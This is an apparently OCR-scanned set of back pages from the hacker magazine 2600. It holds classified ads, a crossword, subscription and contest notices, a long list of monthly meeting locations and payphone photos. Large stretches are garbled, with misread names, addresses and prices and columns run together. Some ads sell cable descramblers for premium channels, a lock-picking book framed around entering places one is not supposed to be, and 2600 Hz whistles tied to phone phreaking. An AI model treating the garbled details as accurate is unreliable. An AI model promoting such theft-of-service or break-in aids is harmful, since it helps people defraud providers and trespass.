telephone. Key ring/cbp. Limited quantity available. Money order only. $24.95 +
$3.00 SIH. Mail order to: PHONE HOME, Nimrod Division. 331 N. New Ballar Road.
Box ~10RO2CRC M8ssOdn 631-1
LEARN LOCK PICKING I t r EASYrvlrh our nook an0 nevr vloca The 2na edltlan
boa. aeor otr mare Intcre5nnq matenal an0 11I t r r a t ~ o n*h# ~ P tne ndeo 8s f l l eo
with computer graphic cutawayviews. Learn what they don't want you to know.
Any security system can be beaten, many timer right through the front door. Learn
the secrets and weakness of today's locks. I f you want to get where you are not
supposed to be, thir book could be your anrwer. Explore the empowering world of
lock . aickino.. Send twentv bucks for the book or video to Standard Publications. PO
Box 2?76hO. Champalgr I.6i825 or mrlr .I at muw.rranaa.opLh Iranan5 ram/
-dvect ?hOO nrrrl fa yo,, 2600reaorr pnce axco .nr
FlLE TRACKING SOFWARE: FI eAcra.ntan:(TM) Wlnoour XPana ater Crearer a
Irt of fVer an yo., naro crl,e. R.8" 11brl0.e and afre. lnrla Ibng ne* prooucr
ano/o dpoarer to ol<car*r r n x n f ler areanoPo mange0 oe nco. Prnr ti$.r.
Mher features. Mare information at:
hap://abi~tybusines~~ompute~~eNice~.~om/fa.html or fa.info@abilityburinerr
~computerrelvicer.com.
SIZE ODES MATIER! TheTwin Towers may be gone forever but a detailed image
still ekisb of the massive 374-foot radio tower that war perched atop One World
Trade Center. Thir high-quality glorry color poster i r available i n two riles (16" x
20" and 20" x 30") and maker a spectacular gift for engineers, scientists, radio and
television buffs, or anybody who appreciates a unique, rarely seen view of the
World Trade Center. Visit www.wtc-p0ster.u~ for samples and to order your own
porter.
CABLE N DESCRAMBLERS. New. (2) 199 + $5.00 shipping. money orderjcarh
only. Works on analog or analog/digital cable systems. Premium channels and pos-
riblv PPV deoendina on rvrtem. Comolete with IlOvac Dower ruoalv. Purchaser ar-
rum& role iesponr;biliGfor notifyin'g cable operator df use of der;rambler.
Requires a cableTV converter (1.e.. Rad~oShack) to be used with the unit. Cable
connects to the converter, then the dercrambler. then the output goes t o TV set
tuned t o channel 3. CO 9621 Olive, Box 28992-TS, Olivettet Sur, M?rrauri63132.
Email: cabledescrambIerguy@yahoo.com.
DECEPTION. The Pine Lake Media Group is pleased to present t o you our debut re-
.
leare. Decelrtion, bv. award-winnino newsmax.cam columnirt Charles Smith. Manv
citizens think they know what their government is doing i n their names. After
reading Deception, you'll see just how bad it really is and how little you really
know. Deception is the true story of the greatest Chinere Army espionage opera-
tional exoloit aaainrt the United Stater. Based on a decade of research and more
than 50.000 paqer of offloa. an0 r.a$?#f#ea ooc.rrentr onratneo urwg rne Free-
do- Of Informarlon An, no o r n v o o c ~p->llrn~cto .a+? even <omparer to llerep-
tion. While many books have "gone after" presidents before, Deceptionis unique
because we've included all of the evidence backino* uo , our charoer. We have the
< - ~
signed letter from Motorola CEO Gary Tooter thanking Ron Brawn, farmer United
States Commerce Department Secretary, for the presidential waiver allowing the
exoort of encrvpted police radios to China. And nearlv 100 other unmodified. un-
emoel >rheaoocimenl< Ihat nnmp "amp<. Orner your cop) tooay f o r ac0,no.a in.
forwarlon a*o to ororr, p ra5Qn v t o.r ~ e b r l r at
r . m a pme aeemeola con or ca I
ROO-799-4570 or (61s) 275-OR3O. P ea5e note tnat re cannot accept oraerr oy
teteohane at this time. Credit card orders ma" be faxed to 800-799-4571 or (514) ,.
27510829. We accept all major credit cards, checkr, money orders, Liberty Dollars.
electronic checks, and good old fashioned cash. We ship worldwide by DHL or
USPS.
CAP'N CRUNCH WHISTLES. Brand new. onlv a few left. THE ORIGINAL WHISTLE i n
mint condition, never used. Join the elite few who own thir treasure! Once they
are gone, that is it - there are no more! Keyrhain hole for keytinq. Identify yourself
at meetings. etc. ar a 2600 member by dangling your keycham and saying nothing.
Cover one hole and get exactly 2600 hz, cover the other hole and get another fre-
quency. Use both holes to call your dog or dolphin. Also, ideal for telephone re-
mote control devices. Price includes mailing. $99.95. Not only a collector's item
but a VERY USEFUL device to carrv at all timer. Carh or monev order 0°C.Mail to:
c
NrllS1.E. PO. Rax 11567-ST. 1. qirrarn 63105.
HOW TO 8E ANONYMOUS ON THE INTfRNkl. fa%$to fn low trson5 an arhwnng
Internetanonymity, privacy, and security. The book's 20 chapters cover 1) simple
proxy use for WW: 2) how to rend and receive e-mail anonymously: 3) use SOCKS
prones for IRC, ICQ. NNTP, SMTP, HTTP: 4) web based proxies - JAP. Multiproxy.
Crowds: 5) do-it-yourself proxies - AnalogX, Wingater; 6) read and post ~n "em-
O~OUDI (Usenet) i n complete privacy: 7) for eav proxies. Learn how to hunt for.
flno. an0 .rl 1zea.l ryper of proxler, clean up y0.r baurers. clean .p yo., m o l e
Nbnoo~rOS This proferriona'.y m n c n 0.t non.tecnnlca.~arqor~f l lea book Ir
geared towards the beginner to advanced readerr and the average Internet user.
The book lessons are on a CD i n easv to read HTMLinterface format with numerous
illustrations throughout. Send $20 (I'll pay S/H) to Plamen Petkov. 1390 E Vegas
Valley Dr. #40. tar Vegas. NV 89109. Money orders, personal checks, cash accepted.
Across

1.Hackersauniv.
3.Legion of -
6.Usenet starter
9,Dir for Unix
10. Bad on a boarding pass
13.CPU, ROM, eg.
14.Independent fortress
phone
18.2.4Ghz transmission
19.Multics successor
21.Early net.
24.Telco wire inits.
25. GUI predecessor
26.2600 build
28. Popular distribution
31. Some hackers break
these
33. White House zone (abbr.)
34. Otwell's farm
35. Meeting space Down 27. MOD'Smark?
36. Framer of the manifesto 29. Pen reg.
39. Old Baby Bell 1. 100010101100 30. Early scene zine
41. Net hell? 2. Social engineering must 32. WWll Ohio shortwave
42.Stood up to the MPAA 3. Back-up media (abbr.) sta.
44. What 2600 repainted 4. Platform (abbr.) 36. Chinese TLD
47. Cow plus yak 5. Degree of achievement 37. What pine is not
48.ALGOL - Latin similarii for some hackers 38. Phrack founder
49. Once 10562 7. Common - 40. String oriented symbolic
50. Do not overtlow this 8. Class 4 CO language
52.The stage for Hackers 11. Quarterly hundreds digit 41. Military secondary
53.Cult's Blood 12. Open source guru 43. Marching orders?
54. Conference Keynoter 15. Bandwidth meas. (abbr.)
55. Cx Cc 16. Flash 44. Oy
17. Off The Hook theme 45. Future armies (acro.)
20. 212, 718 e.g. 46. Old Macintosh
22. P2P enemy 47. 2200+1700*2
23. Much of spam 48. 3110 to Telenet (abbr.)
51. Suffix deserving death?
l ~ o u l dyou prefer it if people didn't see you
lbuying it at the bookstore and follow you
after you leave the stog? \g &>
There's a soluki 84%
II o f It's called t h e 2600 Subscription and it can be yours in a couple
ways. Either send $20 for one year. $37 for two years. o r $52
I for three years (outside t h e U.S. and Canada. that's $30, $54, and
1675 respectively) t o 2600, PO Box 752, Middle Island. NY 11953
I USA or subscribe directly from us online using your credit card a t
I Theoretically you would never have t o leave your house again.

- P
-
many people ask us just how, These are the rules.11 entnes must
many Easter Eggs there are i n the Freedom Downtime DVDs t h a t / /
we've decided t o make a contest out of it. I f vou find the/\ber 1, 2005 and t h e winner ill b e /
highest number of Easter Eggs i n this double DVD iet, you'll win I/
announced i n the Fall 2005 issue.
What constitutes an Easter EaaI
the following: 1 / t h i n g on the DVDs that is deliberG:ly hi;-
/ den i n some way so t h a t you get a Little
I / thrill when you discover it. When you find
n l i f e t i m e subscription t o 2600
1
one of these, we expect y o u t o t e l l us how
you found it and what others must do t o
ALL back issues see it. Simply dumping t h e data on the DVD 1
\One item o f every piece of clothing we sell 11 is not sufficient. 1
j 1 It's possible that there are some Easter
f"IAn O f f The Hook DVD with more possible Easte r Eggs Eggs that don't require you to hit buttons
rl~nother Freedom Downtime DVD since you wr i l l have i but that contain a hidden message1
nonetheless. For Instance, i f you dlscover
probably worn out your old one that tahng the first l e t t e r of every word'
TWO tickets t o the next HOPE conference
.-
that Kevin Mitnick says i n the f l ~ mspells
out a secret rnessaoe bv aLL means ~nclude
- - < ,

1
Submit entries to:
Easter Egg Hunt c/o 2600, PO Box 752, Middle Island, NY 11953 USA
You can get t h e Freedom Downtime double DVD set by sending $30 t o
t h e above address or through our Internet store located a t
\ store.26OO.com.
that. We will be judging entnes on thor-'
oughness and there is no penalty for see-
ing an ~~~t~~ E~~ that isn't there. you can
enter as many times as You wish. Your best
score i s the one that will count. Remember,
there is no second place! So plan on
spending the next few months

Page 63 1
 M@ElWNA
Buenos Ai*: In the bar at Sandgp(K.
AUSTRALIA
Adelaide. At the payphoner near the
AcaSemv Clnenia on Pullenev St 8 pm. , Gremlble: Eve, c a w of St.
Brirbane: Hunsry Jacks on the aueen S t
Mall (RHS, opporitelnfo Booth! 7 pm
Canberra: KC'S VirtualReabty Cafe. 11East
RW. Civic. 7 pm.
Melbourne: Caffeineat Rwault bar. 16
Swaniton Walk. 6 pm.
Perth: The Merchantlea and CoffeeHo~3e.
183 Murray St. 6 pm.
Svdnev:
. . The Crvrtal . Palace, front
barjbirtro, opposite the bur station area
an George Street at Central Station. 6 pm.
AUSTRIA
Gnz: Cafe Haltertelle on Jakominipla+z.
BRAnL
Belo Horizonte: Pelego's Bar at Assufeng.
near the payphone. 6 pm.
CANADA
AlbCIta
Calgary: Eau Claire Market b o d cwrt by
the bland yetow wall. 6 pm.
British Columbia
Nanaimo: Tim Horton'r at Camox 8 Wal-
lace. 7 pm.
Victoria: W Bakery and Cafe.
1701 Government St.
Manitoba
Winnipeg: St. Vital Shopping Centre. food
court by HMV.
New Brunswick
Moncton: Ground Zero Networks Internet
Cafe, 720 Main St. 7 pm.
Ontalio
Barri~ William's Coffee Pub. 335 Bryne
Drive. 7 pm.
Guelph: William'r Coffee Pub.
492 Edinbourgh Road South. 7 pm.
Hamilton: McMarter University Student
Center. Roam 318.7:30 pm.
Ottawa: World Exchange Plaza, 111 Albert
St., second Raor. 630 pm.
Toronto: Future Bakery. 483 Bloor St. Wen
Windror: Univerrity Student Center by the
large window. 7 pm.
Quebec
Montreal: Bell Amphitheatre,
I000 GauchetiereStreet.
CHINA
-
Hans Kong: - Pacific Coffeein festival
Walk. Kowlwn Tong. 7 pm.
UECH REPUBUC
Prague Legenda pub. 6 pm.
DENMARK
Aalborg: Fan Eddy'r pool halL
Aathur: In the far corner of the DSB cafe
in the railway station.
Copenhagen: Ved Cafe Blaren.
Sonderborg: Cafe Druen. 230 pm.
E m
Port L i d : At the foot of the Obelisk
(El Missallah).
ENGUND
Brighton: At the phone boxer by the Seal-
ife Centre (scrarr the road from the Palace
Fier). 7 pm. Payphone: (01273) 606614.
Fxetcr: At the payphoner. Bedford Square.
7 pm.
Hampshire: Outride the Guildhall
Portsmouth.
Hull: The Old Gray Mare Pub, opposite Hull
University. 7 pm.
London: Troedero Shopping Center (near
Picadilly Circus). lowest level. 6 3 0 pm.
Manchcrter: The Green Room on Whit-
worth Street 7 pm.
Nowich: Main foyer of the Norwich
"Forum" Library 5:30 pm.
Reading: Aho Bar, Merchants mce, off
Friar St. 6 pm.
FINLAND
Hcln'nU: Fenniakoltteli food court
(Vuo"btu 14).
FRANCE Florida North Carollna
R. l a u d d a l e : Broward HBU in the food
Awgnon: Bottom of Rue de la Republique
court 8 pm. -.-ha%-
Charlotte: South Park Mall food court.
I
in front ofthe fountain with the flowers. 7 pm.
7 pm. neruillr: in the o i the &r:tiy fmtnsborNBIBFRock Cafe, !&dLv
lorlda'i Reltl Uni<>nfood court 6 pm Shopping rcilte, 6 pm.
d'Hrre; ando: Farhlon Square Mall Food Court Raleigh: l p k Cafe And Intrlnet Garnlng
-*
Pans: Place de la Repi~bllque. ween Hovan (,ourmet and Miinthii Wok Ceotir. Royal rill 3801 Hilkbarough5: b pm.
(emot\il $(ountain.6 pm. 6 pm. Wilmington: Indepeodenr~Mall food
Rennes: I n front of the store 3 l u e Box" Tampa: University Mall in t h e back of the court.
close t o the place of the Repubbc. 7 Pm. food court on the 2nd floor. 6 pm. North Dakota
GREECE Georgia 'Far&-: West Aoei Mall food court by the
Athenr: Outsidethe bookstore Atlanb: Lenox Mall food court. 7 pm. Taco 3ohn'r.
Pa~arwtiriouan the corner of Patirion and Idaho Ohio
Stourman'. 7 pm. Boise: BSU Student Union Building, up- Akron: Aiabica on W Market Street.
IRELAND stairs from the main entrance. Payphaner: interrertian of Hawkinr. W. Market, and
Dublin: Atthe phone booths on Wicklow (208) 342-9700.9701. Exchanqe.
Street besideTower R~mfds.7 Pm. Pocatello: College Market, 604 South 8th Cleveland: Uniwrrity Circle Arabica.
~ L Y Street. 11300 Juniper Rd. Upstairs. turn right, sec-
Milan: Piazza Loreto in hont of McDonalds. Illlnois ond room on left.
JAPAN Chicago: Union Station i n the Great Hall Dayton: At the Marions behind the Dayton
Toltyo: Linux Cafe in Ahhabara district. near the payphanes, 5;30 pm. Mall.
6 pm. Indiana Oklahoma
NEW ZElLAND Evansville: Barnes and Noble cafe at 624 S Oklahoma City: Cafe Bella. southeast
lucklsnd: London Bar, u ~ r t a i n .Wellesley G~~~~ ~i~~~ ~d. corner of SW 89th Street and Penn.
St., Auckhnd CentraL 5:30 pm. Ft. Wayne: Glenbrook Mall food court in Tulsa: Java Dave's Coffee Shop on 81rt and
Christchurch: Java Cafe, corner of High
front of Sbarrosr. pm, Harvard.
St. and Mancherterst. 6 pm. Indianapolis: Corner Coffee, SW corner of Oregon
Wellington: Load Cafe in Cuba Mall. 6 pm.
and Alabama, Portland: Backspace Cafe. 115 NW 5th Ave.
NORWAY South Bend (Mishawaka): Barnsand 6pm.
Oslo: Oslo SentralTrain Station. 7 pm. Noble 4601 GrapeRd,
Pennsylvania
Tromrse: The upper floor at Blaa Rock Iom Alttntown: Paocra Bread. 3100 West
Cafe. 6 pm.
Amer: Santa Fe Erprerro. 116 Welch Ave. Tilghman Street. 6 pm.
Trondheim: Rich Cak in Nardregate. 6 pm. Kansas Philadelphia: 30th Street Ration, under
SCOTLAND Kansas City (Overland Park): Oak Park Stalrwell7 agn.
Gbsgov: Central Station, payphoner next Mall food court. Fittsburgh: William Fitt Union building an
to Platform 1. 7 pm.
Wichita: Riverside Perk, 1144 Bitting Ave. the University of Rteburgh campus by the
SLOVAKIA
Louisiana Bigelow Boulevard entrance.
Presov City: Kelt Pub. 6 pm.
Baton Rouge: In the LSU Union Building, South Caroltna
SOUTH AFRICA
between the Tiger Pause 8 McDonald's, Charleston: Northwoods Mallln the hall
(Sandton City): Sandton
next to the payphoner. between Sean and Chik-Fil-A.
food court 6 3 0 pm.
New Orleans: La Fee Verte. 620 Conti South Dakota
SWEDEN
Street' pm. Sioux F a \ k Emp~reMall, by Bu~gerKing.
Gothenburg: Outstde Vanilj. 6 pm.
Elaine Tennessee
Stockholm: Outside Lava.
Portland: Maine Mall by the bench at the Knoxville: Borderr Bookr Cafe across from
SWITZERLAND
court door' Weltown Mall.
lausanne: I n front of the Mac00 beslde
Ua$anlns Memphis (Cordova): San Francisco Bread
the tram station.
Baltimore: Barnes 8 Noble cafe at the Company. 990 N. Germantown Parkway.
UNITED STATES
Inner Harbor. 6 pm.
Alabama
Massachusetts Nashville: 3-J's Market. 1912 Broadway.
Auburn: The student lounge uprtairr i n
Boston: PrudenbalCenter Plaza, tenace Texas
the Foy Union Bu~lding.7 pm.
food court at the tables near the windows. Austin: oobie Mall food court. 6 pm.
Huntrville: square the
food court near McDonaldp.
Marlborough: Solomon Park Mall food Dallas: Mama's Pizza. Campbell 8 Preston.
7 pm.
i
Tuscaloosa: ~ r h r l a n dM~II food court
Northamptan: Javanet Cafe across from Houston: Ninfa'r Express in front of
near the front entrance.
Arizona Polaski Park. Nordrtrom'r i n the Galleria MalL
Michigan San Antonio: North Star Mall food court.
Phoenix: Borders. 2nd Floor Cafe Area.
2402 E. Camelback Road. Ann Arbor: The Galleria on South Utah
Uniwrsity. Salt Lake City: ZCMI Mallin The Park Food
Tucson: Borders i n the Park Mall. 7 pm.
California Minnesota Court.
L~~ Angeler: Union Stahon, cornerf,, Bbomington: Mall of America, north ride Vermont
Alameda, Indde main entrance by food court, across from Burger King & the Burlington: Borders Books at Church St.
Macy
bank of phones. Pqyphoner: (213) 972-9519, bank lrf payphonesthat don't take and Cherry St. on the second floor ofthe
9520: 625-9923.9924: 613-9704. 9746.
Manterey: Morgan's Coffee & Tea. 498
Washington St.
"imingca'k'
Missouri
Kansas City (Independence): Barnes 8
cafe.
Virginia
Arlington: (nee Oirtrict of Columbia)
I
Orange Couno/ (lake Forest): ~iedrich Noble. *91M East 39th St Virginia Beach: Lynnhaven Mall on
~ St. t Louis (Maryland Heights): Rivah Lynnhaven Parkway. 6 pm.
coffee, 22621
Sunnre and Madaon.
~ oD",,~. ~ 8pm.
Sacramento: camille'r at the corner d
~
Technology Cafe. 11502 6 pm.
Springfield: Borders Booksand Music rof-
Washington
Seattle: Washington State Convention
1
sari biego: R~~~~~~ ~ i 4150~ uegentr ~ , feeshop. 3300 South Glenstone Ave, one Center 6 pm.
Park Row #170. block south of Battlefield Mall. 5:30 Dm. Wisconsin I
San Francisco: 4 Embarcadero PLaza (in- Nebraska Madison: Union South (227 Y. Randall
ride). payphone$:(415) 398-9803.9804, Omaha: Crnrrroadr Mall Food Court. 7 pm. Ave.) on the lower level in the Copper
9805.9806. Nevada Hearth Lounge.
San Jose: Outride the cafe at the MLK ~i. h s VLgsr Palms (asino food court. 8 pm. MIIwaukee: The Node. 1504 E. North Ave.
brary at 4th and E. San Fernando. 6 pm. Nm Mexico
Santa Barbara: cafe Mena on State street. Albuquerque: Winrock Mall food coort, All meetings take place on the first Friday
Colorado near payphones on the lower level between of the month. Unlerr otherwire noted, they
Boulder: Wing Zone food court, 13th and the fountain 8 arcade. Payphone: ($05) start at 5 pm local time.
Collqe. 6 pm. 883-9985.9976.9841.
Denver: Borders Cafe, Parker and Arapahoe. New York To rtarta meeting in your city, leave a mes-
District of Columbia New Yo* Citigroup Center, in the lobby, rage 8 phone number at (631) 751-2600 or
Arlington: Pentagon City Mall in the food near the payphoner. 153 E 53rd St.. rend emarl to meetings@Z600.com.
court. 6 pm. between Lexington 8 3rd.
I
Pay~honesof the world^

Sarnarkand, Uzbekistan. Coins o i ~ l yh u t w h a t

' Mumbai, India. A co111c r i j ~ ~ a i epi lil o n t . dt the
a i n l a g n i f i c e n t h a n d s e t . A i i d j ~ i i iLoolc h o w " Taj Malial H o i < ~ l .
t h e y ' v e r e c o n f ~ g u r e dt h e t o u c h tot-I? p a t i !

Anuradhapura, Sri Lanka. W e ' v ~ i e ~ r it h e Firenze, Italy. A 511 1 1 t3 d q e p h o n e t h a ~~ u o l . .

d c t u a l p h o n e ~n a p r e v l o u s issue b u t t h ~ s as fit's ah0111 t o l ~ i l i , l w l t h ~ n t h ~ ~ s r a s r n
r u ~ a Lp h o n e b o o t h IS a s t r ~ k ~ i sl y~ y h t

Photo by Toin Mele Photo by L o r e t t e Mas

is page can now be found CM

This has to be about the worst idea ever concocted. We've heard of
driverless light rail systems in the confines of an airport but huge
steel freight train locomotives on an easily accessible track?
Technology marches on.
Found in Roseville, CA.
Photo by Adrian Lamo

Ireau of Citizenship and lmmigratlon Alien's Change of I

-
AME (Last in CAPS) (First) (Middle) lAMl
l#W . ..-,ident
-lher ....,... (Speclb
DUNTRY OF W- - L V m~NUMBER FROM ALIEN CARD
ITlZENSHlP
2-
(State) (ZIP Code